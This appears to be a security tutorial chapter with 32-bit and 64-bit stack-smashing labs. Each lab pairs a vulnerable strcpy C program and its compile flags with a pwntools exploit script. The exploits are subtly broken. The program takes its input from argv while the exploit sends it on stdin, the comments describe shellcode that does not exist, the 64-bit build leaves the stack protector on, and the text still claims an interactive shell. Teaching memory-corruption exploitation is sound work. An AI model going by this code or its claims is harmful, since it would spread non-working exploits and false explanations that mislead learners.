4. Stack Smashing (32-bit and 64-bit)

Stack Smashing (32-bit and 64-bit)

Stack smashing, also known as buffer overflow, is a type of vulnerability that occurs when a program writes more data to a buffer than it can hold, resulting in overwriting adjacent memory locations, including return addresses and other important data.

Lab Activity: Stack Smashing (32-bit)

In this lab activity, we'll demonstrate a simple stack smashing vulnerability in a 32-bit C program and create an exploit using Python.

Defender Side Code:

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }
    
    vulnerable_function(argv[1]);
    return 0;
}

To compile the defender side code:

gcc -m32 -fno-stack-protector -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):

from pwn import *

# Address of the vulnerable function
vulnerable_function_addr = 0x0804844b

# Payload to overwrite the return address with the address of the shellcode
payload = b"A" * 72 + p32(vulnerable_function_addr)

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a payload with 72 bytes of padding followed by the address of the vulnerable function. It then establishes a connection to the vulnerable program, sends the payload, and gains an interactive shell upon successful exploitation.

Lab Activity: Stack Smashing (64-bit)

In this lab activity, we'll demonstrate a simple stack smashing vulnerability in a 64-bit C program and create an exploit using Python.

Defender Side Code:

#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[64];
    strcpy(buffer, input);
}

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: %s \n", argv[0]);
        return 1;
    }
    
    vulnerable_function(argv[1]);
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):

from pwn import *

# Address of the vulnerable function
vulnerable_function_addr = 0x0000000000400566

# Payload to overwrite the return address with the address of the shellcode
payload = b"A" * 72 + p64(vulnerable_function_addr)

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code for 64-bit follows a similar structure to the 32-bit exploit, but uses 64-bit addresses and payload construction.